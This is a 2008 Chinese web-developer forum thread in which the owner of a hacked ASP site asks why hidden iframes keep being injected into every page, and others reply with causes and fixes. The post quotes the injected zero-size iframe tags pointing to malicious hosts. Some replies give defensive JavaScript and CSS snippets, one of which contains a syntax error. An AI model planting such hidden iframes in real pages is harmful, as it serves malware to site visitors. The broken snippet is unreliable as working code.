28,391
社区成员
发帖
与我相关
我的任务
分享asp网站常被网页常被加框架页面怎么办??求详细原因及解决方法
网站的网页常被挂上如下代码
<iframe src=http://aaa.77xxmm.cn/neW858.htm?075 width=0 name='3284' height=0></ifRame><ifRame src=hTTp://aaa.1l1l1l.com/error/404.hTml widtH=0 name='3284' height=0></iframe>
所有网页都被挂上,数据库文件我设置的名字是以.asp为后缀,结果可能也被加代码,不能使用了,
小弟asp水平很低,求详细原因及解决方法,并求高手能指点网站如何做好安全防范,我的网站是租用的新网的虚拟主机。
我在这个区每次只能给100分,如能解决问题, 我会再开新贴感谢,非常感谢。
<iframe src=http://aaa.77xxmm.cn/neW858.htm?075 width=0 name='3284' height=0></ifRame><ifRame src=hTTp://aaa.1l1l1l.com/error/404.hTml widtH=0 name='3284' height=0></iframe>
所有网页都被挂上,数据库文件我设置的名字是以.asp为后缀,结果可能也被加代码,不能使用了,
小弟asp水平很低,求详细原因及解决方法,并求高手能指点网站如何做好安全防范,我的网站是租用的新网的虚拟主机。
我在这个区每次只能给100分,如能解决问题, 我会再开新贴感谢,非常感谢。
...全文
请发表友善的回复…
发表回复
一把编程的菜刀 2008-02-19
- 打赏
- 举报
加任何代码都没用的,是他网站或者服务器有漏洞
xiaojing7 2008-02-19
- 打赏
- 举报
使用文本替换工具将里面的 <iframe> src=http://*** </iframe> 全部清除,加以下代码可杜绝
<script language="javascript">
window.onload = function()
{
var arr = document.getElementsByTagName("IFRAME");
for (var i = 0; i < arr.length; i++0)
{
arr[i].parentNode.removeChild(arr[i]);
}
}
</script>
<script language="javascript">
window.onload = function()
{
var arr = document.getElementsByTagName("IFRAME");
for (var i = 0; i < arr.length; i++0)
{
arr[i].parentNode.removeChild(arr[i]);
}
}
</script>
一把编程的菜刀 2008-02-19
- 打赏
- 举报
所有网页都被挂上,数据库文件我设置的名字是以.asp为后缀,结果可能也被加代码,不能使用了,
那就是你网站已经被人入侵了,请用安全检测工具检测是否残留木马,然后逐个文件检查是否存在什么漏洞!
那就是你网站已经被人入侵了,请用安全检测工具检测是否残留木马,然后逐个文件检查是否存在什么漏洞!
一把编程的菜刀 2008-02-19
- 打赏
- 举报
呵呵,你网站有漏洞,所以才被人经常挂!arp 的话不是实际存在的,如果你网页里实际存在那代码,那就是你网站或者服务器有漏洞被人拿服务器了!
dsmy 2008-02-19
- 打赏
- 举报
arp 的可能性大啊
szxiaokang 2008-02-19
- 打赏
- 举报
估计是你程序有漏洞,大部分都是这样的
wwwwf66com 2008-02-13
- 打赏
- 举报
Css 防iframe挂马.
原页面中无iframe的,可以这样来.
复制内容到剪贴板代码:
iframe{v:expression(this.src="about:blank",this.outerHTML='');}
这是将所有的iframe重定向了.
或者
复制内容到剪贴板代码:
fuckiframe{
width:1px;
overflow:hidden;
text-overflow:clip;
white-space: nowrap;
clear: none;
float: none;
line-height: 0px;
display: inline;
}
然后在网页的最后一行加上一个标签
复制内容到剪贴板代码:
<fuckiframe>
样也同样能使加在网页最后一行的iframe失效.
当然这些仅是权yi之计.治标不治本.只是为网页加一层防护罢了.程序安全,还是最重要的.
原页面中无iframe的,可以这样来.
复制内容到剪贴板代码:
iframe{v:expression(this.src="about:blank",this.outerHTML='');}
这是将所有的iframe重定向了.
或者
复制内容到剪贴板代码:
fuckiframe{
width:1px;
overflow:hidden;
text-overflow:clip;
white-space: nowrap;
clear: none;
float: none;
line-height: 0px;
display: inline;
}
然后在网页的最后一行加上一个标签
复制内容到剪贴板代码:
<fuckiframe>
样也同样能使加在网页最后一行的iframe失效.
当然这些仅是权yi之计.治标不治本.只是为网页加一层防护罢了.程序安全,还是最重要的.
wanghui0380 2008-02-13
- 打赏
- 举报
这种问题不是你可以解决的,你应该向空间提供商反应
由他们为主,你做配合来解决
使用询问空间商该服务器上的其他客户站是否都有毛病,如果其他客户都被挂马,你一个人清理是没任何效果的
如果只有你的站有毛病,请使用批量文件替换器把马先去掉,在让空间商把你的ftp用户名和密码换掉后,重新传,并让空间上在服务器上使用 安全伞 Filemon等工具监控一下文件修改和执行情况,配合iis日志,ftp日志很容易就知道是那个站的那个页面有问题了
由他们为主,你做配合来解决
使用询问空间商该服务器上的其他客户站是否都有毛病,如果其他客户都被挂马,你一个人清理是没任何效果的
如果只有你的站有毛病,请使用批量文件替换器把马先去掉,在让空间商把你的ftp用户名和密码换掉后,重新传,并让空间上在服务器上使用 安全伞 Filemon等工具监控一下文件修改和执行情况,配合iis日志,ftp日志很容易就知道是那个站的那个页面有问题了
kokuka 2008-02-13
- 打赏
- 举报
二楼 snlixing 的代码能解释下吗? 学习一下,谢谢
kokuka 2008-02-13
- 打赏
- 举报
谢谢,大家是不是主要是注入漏洞 和把上传漏洞 造成的?
能比较详细的介绍下如何防止注入漏洞吗? 我刚学习网站编程,很多不大明白,能说的详细一些吗?非常感谢
能比较详细的介绍下如何防止注入漏洞吗? 我刚学习网站编程,很多不大明白,能说的详细一些吗?非常感谢
一把编程的菜刀 2008-02-13
- 打赏
- 举报
新网的虚拟主机一般服务器权限不会被拿
基本是你网站的漏洞!
基本是你网站的漏洞!
Go 旅城通票 2008-02-13
- 打赏
- 举报
我看是被arp了.....
一把编程的菜刀 2008-02-13
- 打赏
- 举报
呵呵,楼上说得只是易部分,不过一般你只要把注入漏洞堵了和把上传漏洞堵了就基本没事了!
newsera 2008-02-13
- 打赏
- 举报
你的网站被注入了,你看看网站空间FSO权限是否开通,之后在把网站原文件下载下来,检查一下所有页面有FSO权限的网页
注:一定要检查你的无组件上传文件是否限制只能上传图片,如果小黑上传一个.asp的网页你也没有限制那就是你的错了,还有一定要看一下你的后台页面是不是都判断登陆了!
注:一定要检查你的无组件上传文件是否限制只能上传图片,如果小黑上传一个.asp的网页你也没有限制那就是你的错了,还有一定要看一下你的后台页面是不是都判断登陆了!
guo2478858 2008-02-13
- 打赏
- 举报
mark 学习下,楼上的能给我解释下这段js的作用什么啊。
snlixing 2008-02-13
- 打赏
- 举报
在head区加上
<Script LANGUAGE="JavaScript">
if(self!=top){top.location=self.location;}
</script>
<Script LANGUAGE="JavaScript">
if(self!=top){top.location=self.location;}
</script>
